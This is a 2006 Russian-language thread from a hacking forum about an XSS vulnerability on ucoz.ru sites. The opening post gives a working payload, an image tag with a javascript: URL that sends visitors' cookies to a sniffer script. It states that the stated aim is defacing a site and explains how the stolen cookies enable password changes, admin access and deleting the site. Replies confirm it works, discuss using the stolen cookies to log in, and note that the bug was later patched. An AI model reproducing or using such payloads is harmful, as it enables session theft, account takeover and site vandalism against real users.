Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   ucoz.ru (https://forum.antichat.xyz/showthread.php?t=16959)

Zadoxlik 03.04.2006 13:02

ucoz.ru
 
Просто была необходимость задефейсить один сайтик на укоз.ру

[img ]javascript:document.images%5b0%5d.src=%22http://snif/sniffer.php?%22+document.cookie[/img]

Вот уязвимость хсс для интернет эксплорер. С помощью полученных кук можно сменить пароль жертвы (и вообще все настройки аккаунта), пройти в любой раздел,(админка,добавка/редактирование новостей и все остальное - зависит от того чьи куки стыбрил), ну а с этим легко можно сделать дефейс или снести просто весь сайт.

Antony_ 05.04.2006 23:35

Спасибо огромное. Всё работает!
Кстати, никто не знает...каким образом шифруется там пароль...
p.s. Только в админку попасть вроде как нельзя. т.к. приходят куки от форума(сайта), но не от аккакунта. А это два разных пасса.
Либо я чего - то не понимаю?

D1ma 08.04.2006 01:20

При замене своих кук полученными,не заходит Админом :(

Antony_ 08.04.2006 16:03

Заходит, но только на форум(у меня покрайне мере так ?
А что менял? Какие значения?

Antony_ 10.04.2006 18:04

Багу прикрыли :(


Время: 04:05